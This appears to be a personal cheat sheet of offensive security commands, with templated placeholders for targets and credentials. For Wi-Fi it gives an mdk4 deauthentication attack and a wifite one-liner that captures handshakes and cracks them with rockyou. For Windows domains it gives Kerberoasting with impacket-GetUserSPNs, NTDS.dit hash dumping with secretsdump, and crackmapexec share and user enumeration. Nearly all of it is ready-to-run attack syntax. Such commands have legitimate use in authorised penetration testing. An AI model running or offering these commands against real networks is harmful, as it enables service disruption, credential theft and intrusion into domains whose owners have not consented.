Just some cheat sheets for things I sometimes forget the syntax for.


  • airodump-ng --band abg --wps --showack --ignore-negative-one --beacons --write {filename} {inet}
  • mdk4 {inet} d -w {whitelist filename} -c h:1200 -s 20 -x
  • service NetworkManager stop; service wpa_supplicant stop; service networking stop; killall wpa_supplicant; for i in `iw dev |grep -i interface |awk '{print $2}'`; do ip link set $i down; iw $i set monitor control; ip link set $i up; xterm -hold -e 'wifite -p 120 --new-hs --dict /usr/share/wordlists/rockyou.txt --pmkid-timeout 300 -inf -mac -ic --skip-crack -i $i' ; done

Windows Environments

  • impacket-GetUserSPNs -target-domain {domain} -usersfile {File containing users to request spn for} -dc-ip {dcip} -request {domain}/{login}:{pass}@{target IP} 
  • impacket-GetUserSPNs -target-domain {domain} -dc-ip {dcip} -request {domain}/{login}:{pass}@{target IP} # this should grab whatever spn is available
  • impacket-GetUserSPNs -target-domain {domain} -dc-ip {dcip} -request -request-user {specific user} {domain}/{login}:{pass}@{target IP}
  • impacket-secretsdump -system ../registry/SYSTEM -security ../registry/SECURITY -ntds ntds.dit local
  • crackmapexec smb {target} -u '' -p '' --shares
  • crackmapexec smb {target} -u {login/userlist} -p {pass/passlist} --users